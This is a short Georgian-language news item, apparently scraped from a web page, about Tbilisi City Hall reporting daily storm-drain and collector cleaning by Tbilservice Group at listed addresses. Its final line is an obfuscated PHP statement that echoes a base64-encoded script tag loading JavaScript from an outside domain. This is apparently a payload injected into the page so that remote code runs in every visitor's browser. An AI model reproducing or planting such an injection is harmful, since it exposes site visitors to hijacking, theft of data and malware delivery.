celsiusi
ავერსი შნაიდერი

 თბილისის მერიის ინფორმაციით, შპს „თბილსერვის ჯგუფი“ დედაქალაქში სანიაღვრე ქსელებისა და კოლექტორების გაწმენდას ყოველდღიურ რეჟიმში განაგრძობს.

მათივე ცნობით, ამ ეტაპზე სპეცტექნიკის საშუალებით ირეცხება ჭავჭავაძის გამზირზე არსებული სანიაღვრე ქსელი და კოლექტორი.

„ამას გარდა, მიმდინარე კვირის განმავლობაში სანიაღვრე სისტემა უკვე გაიწმინდა 34 მისამართზე: ბელიაშვილის ქუჩაზე, მაჭავარიანის, ასევე, მაჭავარიანის ქუჩისა და გელოვანის გამზირის დამაკავშირებელ გზაზე; ბერიტაშვილის, ცხვედაძის, აბაშიძის ქუჩებზე, თამარ მეფის გამზირზე; ასევე, მტკვრის მარჯვენა სანაპიროზე – თამარ მეფის ხიდის მიმდებარედ; ცინცაძის, ზაქარიაძის, სვანიძის ქუჩებზე; წყნეთში – რუსთაველის ქუჩაზე, დოლიძის, ნოზაძისა და უნივერსიტეტის ქუჩებზე; სარაჯიშვილის გამზირზე, ზღვისუბნის მე-4 მიკრორაიონში; მტკვრის მარცხენა სანაპიროზე – შალიკაშვილის ხიდის მიმდებარედ; შენგელიას, ბოჭორიშვილის, ბენდელიანის, ჯავის ქუჩებზე; გლდანის მე-5 და მე-7 მიკრორაიონებში; შეშელიძის, კობის, თიანეთის, ასევე, კაპანაძისა და ღოღობერიძის ქუჩებზე; კახეთის გზატკეცილი N50-ის მიმდებარედ, მარუაშვილის, აბაშვილის, ციხისძირისა და გუდარეხის ქუჩებზე.

აგრეთვე, რამდენიმე ლოკაციაზე ცენტრალური კოლექტორის ვიდეოკამერით დათვალიერება მოხდა“, – აცხადებენ თბილისის მერიაში.

მერიაში აღნიშნავენ, რომ ქალაქის მასშტაბით მსგავსი ტიპის სამუშაოებს „თბილსერვის ჯგუფის“ თანამშრომლები მთელი წლის განმავლობაში ასრულებენ.

339
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");